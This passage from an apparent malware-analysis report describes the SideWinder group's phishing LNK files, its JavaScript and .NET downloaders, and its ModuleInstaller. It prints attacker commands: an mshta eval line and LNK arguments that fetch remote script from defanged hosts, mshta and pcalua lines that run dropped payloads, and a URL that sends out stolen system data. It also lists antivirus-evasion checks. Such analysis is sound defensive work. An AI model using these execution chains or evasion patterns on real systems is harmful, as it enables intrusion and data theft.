class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e1f542589114-2"><span class="crayon-s">\"hxxps://mofa-gov-</span></div><div class="crayon-line" id="crayon-67446d0bc5e1f542589114-3"><span class="crayon-s">sa.direct888[.]net/015094_consulategz\",false);x.Send();eval(x.ResponseText);window.close()"</span><span class="crayon-sy">)</span></div></div></td> </tr> </table> </div> </div><p> <h3 id="initial-infection-lnk">Initial infection LNK</h3> <p>During the investigation we also observed another infection vector delivered via a spear-phishing email with a ZIP file attached. The ZIP archive is distributed with names intended to trick the victim into opening the file. The attacker frequently uses names that refer to important events such as the Hajj, the annual Islamic pilgrimage to Mecca.</p> <p align="center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145646/SideWinder_2024_06.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-114132" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145646/SideWinder_2024_06.png" alt="" width="105" height="149" /></a></p> <p>The archive usually contains an LNK file with the same name as the archive. For example:</p> <table width="100%"> <tbody> <tr> <td width="50%"><strong>ZIP filename</strong></td> <td width="50%"><strong>LNK filename</strong></td> </tr> <tr> <td>moavineen-e-hujjaj hajj-2024.zip</td> <td>MOAVINEEN-E-HUJJAJ HAJJ-2024.docx.lnk</td> </tr> <tr> <td>NIMA Invitation.zip</td> <td>NIMA Invitation.doc.lnk</td> </tr> <tr> <td>Special Envoy Speech at NCA.zip</td> <td>Special Envoy Speech at NCA.jpg .lnk</td> </tr> <tr> <td>දින සංශෝධන කර ගැනිම.zip (Amending dates)</td> <td>දින සංශෝධන කර ගැනිම .lnk</td> </tr> <tr> <td>offer letter.zip</td> <td>offer letter.docx.lnk</td> </tr> </tbody> </table> <p>The LNK file points to the “mshta.exe” utility, which is used to execute JavaScript code hosted on a malicious website controlled by the attacker.</p> <p>Below are the configuration values extracted from one of these LNK files:</p> <div id="crayon-67446d0bc5e28772762513" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> Local Base Path : C:\Windows\System32\sshtw.png Description : MOAVINEEN-E-HUJJAJ HAJJ-2024.docx Relative Path : ..\..\..\Windows\System32\calca.exe Link Target: C:\Windows\System32\mshta.exe Working Directory : C:\Windows\System32 Command Line Arguments : "hxxps://mora.healththebest[.]com/8eee4f/mora/hta?q=0" Icon File Name : %systemroot%\System32\moricons.dll Machine ID : desktop-84bs21b</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e28772762513-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e28772762513-2">2</div><div class="crayon-num" data-line="crayon-67446d0bc5e28772762513-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e28772762513-4">4</div><div class="crayon-num" data-line="crayon-67446d0bc5e28772762513-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e28772762513-6">6</div><div class="crayon-num" data-line="crayon-67446d0bc5e28772762513-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e28772762513-8">8</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e28772762513-1"><span class="crayon-e">Local </span><span class="crayon-e">Base </span><span class="crayon-i">Path</span><span class="crayon-h"> </span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">C</span><span class="crayon-sy">:</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">System32</span><span class="crayon-sy">\</span><span class="crayon-i">sshtw</span><span class="crayon-sy">.</span><span class="crayon-e">png</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e28772762513-2"><span class="crayon-i">Description</span><span class="crayon-h"> </span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">MOAVINEEN</span>-<span class="crayon-i">E</span>-<span class="crayon-e">HUJJAJ </span><span class="crayon-i">HAJJ</span>-<span class="crayon-cn">2024.docx</span></div><div class="crayon-line" id="crayon-67446d0bc5e28772762513-3"><span class="crayon-e">Relative </span><span class="crayon-i">Path</span><span class="crayon-h"> </span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">.</span><span class="crayon-sy">.</span><span class="crayon-sy">\</span><span class="crayon-sy">.</span><span class="crayon-sy">.</span><span class="crayon-sy">\</span><span class="crayon-sy">.</span><span class="crayon-sy">.</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">System32</span><span class="crayon-sy">\</span><span class="crayon-i">calca</span><span class="crayon-sy">.</span><span class="crayon-e">exe</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e28772762513-4"><span class="crayon-e">Link </span><span class="crayon-i">Target</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">C</span><span class="crayon-sy">:</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">System32</span><span class="crayon-sy">\</span><span class="crayon-i">mshta</span><span class="crayon-sy">.</span><span class="crayon-e">exe</span></div><div class="crayon-line" id="crayon-67446d0bc5e28772762513-5"><span class="crayon-e">Working </span><span class="crayon-i">Directory</span><span class="crayon-h"> </span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">C</span><span class="crayon-sy">:</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-e">System32</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e28772762513-6"><span class="crayon-e">Command </span><span class="crayon-e">Line </span><span class="crayon-i">Arguments</span><span class="crayon-h"> </span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-s">"hxxps://mora.healththebest[.]com/8eee4f/mora/hta?q=0"</span></div><div class="crayon-line" id="crayon-67446d0bc5e28772762513-7"><span class="crayon-e">Icon </span><span class="crayon-e">File </span><span class="crayon-i">Name</span><span class="crayon-h"> </span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">systemroot</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">System32</span><span class="crayon-sy">\</span><span class="crayon-i">moricons</span><span class="crayon-sy">.</span><span class="crayon-e">dll</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e28772762513-8"><span class="crayon-e">Machine </span><span class="crayon-i">ID</span><span class="crayon-h"> </span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">desktop</span>-<span class="crayon-cn">84bs21b</span></div></div></td> </tr> </table> </div> </div><p> <h2 id="downloader-module">Downloader module</h2> <p>The RTF exploits and LNK files execute the same JavaScript malware. This script decodes an embedded payload that is stored as a base64-encoded string. The payload is a .NET library named “App.dll”, which is then invoked by the script.</p> <div id="attachment_114133" style="width: 673px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145900/SideWinder_2024_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114133" class="size-full wp-image-114133" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145900/SideWinder_2024_07.png" alt="JavaScript loader (beautified)" width="663" height="162" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145900/SideWinder_2024_07.png 663w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145900/SideWinder_2024_07-300x73.png 300w" sizes="(max-width: 663px) 100vw, 663px" /></a><p id="caption-attachment-114133" class="wp-caption-text">JavaScript loader (beautified)</p></div> <p>App.dll is a simple downloader or dropper configured to retrieve another .NET payload from a remote URL passed as an argument by the JavaScript, or to decode and execute another payload passed as an argument.</p> <p>The library should be executed by invoking the “Programs.Work()” method, which can receive three arguments as input. We named the inputs as follows:</p> <table width="100%"> <tbody> <tr> <td width="30%"><strong>Argument</strong></td> <td width="70%"><strong>Argument description</strong></td> </tr> <tr> <td>C2_URL</td> <td>An optional argument that can be used to pass a URL used to download a remote payload.</td> </tr> <tr> <td>Payload_filename</td> <td>An optional argument that can be used together with the “Payload_Data” argument to create a file on the local filesystem that will contain the dropped payload.</td> </tr> <tr> <td>Payload_data</td> <td>An optional argument that can be used to pass an encoded payload that should be dropped on the local filesystem.</td> </tr> </tbody> </table> <p>App.dll starts by collecting information about installed endpoint security products. In particular, Avast and AVG solutions are of interest to the malware. The collected data are sent to the C2. Then, if the “Payload_data” argument is not “Null”, it decodes and decompresses the data using base64 and Gzip. The resulting payload is stored in the user’s Temp directory using the filename specified in the “Payload_filename” argument.</p> <p>If Avast or AVG solutions are installed, the content of the dropped file is executed with the following command:</p> <div id="crayon-67446d0bc5e2a695178061" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> mshta.exe "javascript:WshShell = new ActiveXObject("WScript.Shell");WshShell.Run("%TEMP%\%Payload_filename%", 1, false);window.close()</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e2a695178061-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e2a695178061-2">2</div><div class="crayon-num" data-line="crayon-67446d0bc5e2a695178061-3">3</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e2a695178061-1"><span class="crayon-i">mshta</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span><span class="crayon-h"> </span><span class="crayon-s">"javascript:WshShell = new </span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e2a695178061-2"><span class="crayon-s">ActiveXObject("</span><span class="crayon-i">WScript</span><span class="crayon-sy">.</span><span class="crayon-i">Shell</span><span class="crayon-s">");WshShell.Run("</span><span class="crayon-sy">%</span><span class="crayon-i">TEMP</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-sy">%</span><span class="crayon-i">Payload_filename</span><span class="crayon-sy">%</span>"<span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-cn">1</span><span class="crayon-sy">,</span><span class="crayon-h"> </span></div><div class="crayon-line" id="crayon-67446d0bc5e2a695178061-3"><span class="crayon-t">false</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span><span class="crayon-i">window</span><span class="crayon-sy">.</span><span class="crayon-e">close</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div></div></td> </tr> </table> </div> </div><p> Otherwise, it will be executed with the following command:</p> <div id="crayon-67446d0bc5e2c664845986" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> pcalua.exe -a %TEMP%\%Payload_filename%</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e2c664845986-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e2c664845986-1"><span class="crayon-i">pcalua</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span><span class="crayon-h"> </span>-<span class="crayon-i">a</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">TEMP</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-sy">%</span><span class="crayon-i">Payload_filename</span><span class="crayon-sy">%</span></div></div></td> </tr> </table> </div> </div><p> If the attacker provides a C2_URL, the malware attempts to download another payload from the specified remote URL. The obtained data is decoded with an XOR algorithm using the first 32 bytes of the received payload as the key.</p> <p>The resulting file should be .NET malware named “ModuleInstaller.dll”.</p> <h2 id="moduleinstaller">ModuleInstaller</h2> <p>The ModuleInstaller malware is a downloader used to deploy the Trojan used to maintain a foothold on compromised machines, a malicious component we dubbed “Backdoor loader module”. We have been observing this specific component since 2020, but previously we only described it in our private intelligence reports.</p> <p>ModuleInstaller was designed to drop at least four files: a legitimate and signed application used to sideload a malicious library, a .config manifest embedded in the program as a resource and required by the next stage to properly load additional modules, a malicious library, and an encrypted payload. We observed various combinations of the dropped files, the most common being:</p> <div id="crayon-67446d0bc5e2e400679548" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-mixed-highlight" title="Contains Mixed Languages"></span><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> %Malware Directory%\vssvc.exe %Malware Directory%\%encryptedfile% %Malware Directory%\vsstrace.dll %Malware Directory%\vssvc.exe.config</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e2e400679548-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e2e400679548-2">2</div><div class="crayon-num" data-line="crayon-67446d0bc5e2e400679548-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e2e400679548-4">4</div><div class="crayon-num" data-line="crayon-67446d0bc5e2e400679548-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e2e400679548-6">6</div><div class="crayon-num" data-line="crayon-67446d0bc5e2e400679548-7">7</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e2e400679548-1"><span class="crayon-ta">%</span><span class="crayon-i">Malware</span><span class="crayon-h"> </span><span class="crayon-i">Directory</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">vssvc</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e2e400679548-2"> </div><div class="crayon-line" id="crayon-67446d0bc5e2e400679548-3"><span class="crayon-ta">%</span><span class="crayon-i">Malware</span><span class="crayon-h"> </span><span class="crayon-i">Directory</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-sy">%</span><span class="crayon-i">encryptedfile</span><span class="crayon-sy">%</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e2e400679548-4"> </div><div class="crayon-line" id="crayon-67446d0bc5e2e400679548-5"><span class="crayon-ta">%</span><span class="crayon-i">Malware</span><span class="crayon-h"> </span><span class="crayon-i">Directory</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">vsstrace</span><span class="crayon-sy">.</span><span class="crayon-i">dll</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e2e400679548-6"> </div><div class="crayon-line" id="crayon-67446d0bc5e2e400679548-7"><span class="crayon-sy">%</span><span class="crayon-e">Malware </span><span class="crayon-i">Directory</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">vssvc</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span><span class="crayon-sy">.</span><span class="crayon-i">config</span></div></div></td> </tr> </table> </div> </div><p> or</p> <div id="crayon-67446d0bc5e30052144267" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-mixed-highlight" title="Contains Mixed Languages"></span><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> %Malware Directory%\WorkFolders.exe %Malware Directory%\%encryptedfile% %Malware Directory%\propsys.dll %Malware Directory%\WorkFolders.exe.config</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e30052144267-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e30052144267-2">2</div><div class="crayon-num" data-line="crayon-67446d0bc5e30052144267-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e30052144267-4">4</div><div class="crayon-num" data-line="crayon-67446d0bc5e30052144267-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e30052144267-6">6</div><div class="crayon-num" data-line="crayon-67446d0bc5e30052144267-7">7</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e30052144267-1"><span class="crayon-ta">%</span><span class="crayon-i">Malware</span><span class="crayon-h"> </span><span class="crayon-i">Directory</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">WorkFolders</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e30052144267-2"> </div><div class="crayon-line" id="crayon-67446d0bc5e30052144267-3"><span class="crayon-ta">%</span><span class="crayon-i">Malware</span><span class="crayon-h"> </span><span class="crayon-i">Directory</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-sy">%</span><span class="crayon-i">encryptedfile</span><span class="crayon-sy">%</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e30052144267-4"> </div><div class="crayon-line" id="crayon-67446d0bc5e30052144267-5"><span class="crayon-ta">%</span><span class="crayon-i">Malware</span><span class="crayon-h"> </span><span class="crayon-i">Directory</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">propsys</span><span class="crayon-sy">.</span><span class="crayon-i">dll</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e30052144267-6"> </div><div class="crayon-line" id="crayon-67446d0bc5e30052144267-7"><span class="crayon-sy">%</span><span class="crayon-e">Malware </span><span class="crayon-i">Directory</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">WorkFolders</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span><span class="crayon-sy">.</span><span class="crayon-i">config</span></div></div></td> </tr> </table> </div> </div><p> ModuleInstaller embeds the following resources:</p> <table width="100%"> <tbody> <tr> <td width="25%"><strong>Resource name</strong></td> <td width="40%"><strong>MD5</strong></td> <td width="35%"><strong>Description</strong></td> </tr> <tr> <td>Interop_TaskScheduler_x64</td> <td>95a49406abce52a25f0761f92166c18a</td> <td>Interop.TaskScheduler.dll for 64-bit systems used to create Windows Scheduled Tasks</td> </tr> <tr> <td>Interop_TaskScheduler_x86</td> <td>dfe750747517747afa2cee76f2a0f8e4</td> <td>Interop.TaskScheduler.dll for 32-bit systems used to create Windows Scheduled Tasks</td> </tr> <tr> <td>manifest</td> <td>d3136d7151f60ec41a370f4743c2983b</td> <td>XML manifest dropped as .config file</td> </tr> <tr> <td>PeLauncher</td> <td>22e3a5970ae84c5f68b98f3b19dd980b</td> <td>.NET program not used in the code</td> </tr> <tr> <td>shellcode</td> <td>32fc462f80b44013caeada725db5a2d1</td> <td>Shellcode used to load libraries, which exports a function named “Start”</td> </tr> <tr> <td>StealerBot_CppInstaller</td> <td>a107f27e7e9bac7c38e7778d661b78ac</td> <td>C++ library used to download two malicious libraries and create persistence points</td> </tr> </tbody> </table> <p>The downloader is configured to receive a URL as input and parse it to extract a specific value from a variable. The retrieved value is then compared with a list of string values that appear to be substrings of well-known endpoint security solutions:</p> <table width="100%"> <tbody> <tr> <td width="30%"><strong>Pattern</strong></td> <td width="70%"><strong>Endpoint Security Solution</strong></td> </tr> <tr> <td>q=apn</td> <td>Unknown</td> </tr> <tr> <td>aspers</td> <td>Kaspersky</td> </tr> <tr> <td>Afree</td> <td>McAfee (misspelled)</td> </tr> <tr> <td>avast</td> <td>Avast</td> </tr> <tr> <td>avg</td> <td>AVG</td> </tr> <tr> <td>orton</td> <td>Norton</td> </tr> <tr> <td>360</td> <td>360 Total Security</td> </tr> <tr> <td>avir</td> <td>Avira</td> </tr> </tbody> </table> <p>ModuleInstaller supports six infection routines, which differ in the techniques used to execute “Backdoor loader module” or download the components, but share similarities in the main logic. Some of these routines also include tricks to remove evidence, while others don’t. The malware only runs one specific routine chosen according to the value received as an argument and the value of an internal configuration embedded in the code.</p> <table width="100%"> <tbody> <tr> <td width="50%"><strong>Routine</strong></td> <td width="50%"><strong>Conditions</strong></td> </tr> <tr> <td>Infection Routine 1</td> <td>Executed when substring “q=apn” is detected.</td> </tr> <tr> <td>Infection Routine 2</td> <td>Executed when a specific byte of the internal config is equal to “1”.</td> </tr> <tr> <td>Infection Routine 3</td> <td>Executed when the substring “360” is detected.</td> </tr> <tr> <td>Infection Routine 4</td> <td>Executed when the substring “avast” or “avir” is detected.</td> </tr> <tr> <td>Infection Routine 5</td> <td>Executed when the substring “aspers” or “Afree” is detected</td> </tr> <tr> <td>Infection Routine 6</td> <td>Default case. Executed when all the other conditions are not satisfied.</td> </tr> </tbody> </table> <p>All the routines collect information about the compromised system. Specifically, they collect:</p> <ul> <li>Current username;</li> <li>Processor names and number of cores;</li> <li>Physical disk name and size;</li> <li>The values of the TotalVirtualMemorySize and TotalVisibleMemorySize properties;</li> <li>Current hostname;</li> <li>Local IP address;</li> <li>Installed OS;</li> <li>Architecture.</li> </ul> <p>The collected data are then encoded in base64 and concatenated with a C2 URL embedded in the code, inside a variable named “data”.</p> <div id="crayon-67446d0bc5e32523100545" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> hxxps://dynamic.nactagovpk[.]org/735e3a_download?data=<stoleninfo></textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e32523100545-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px 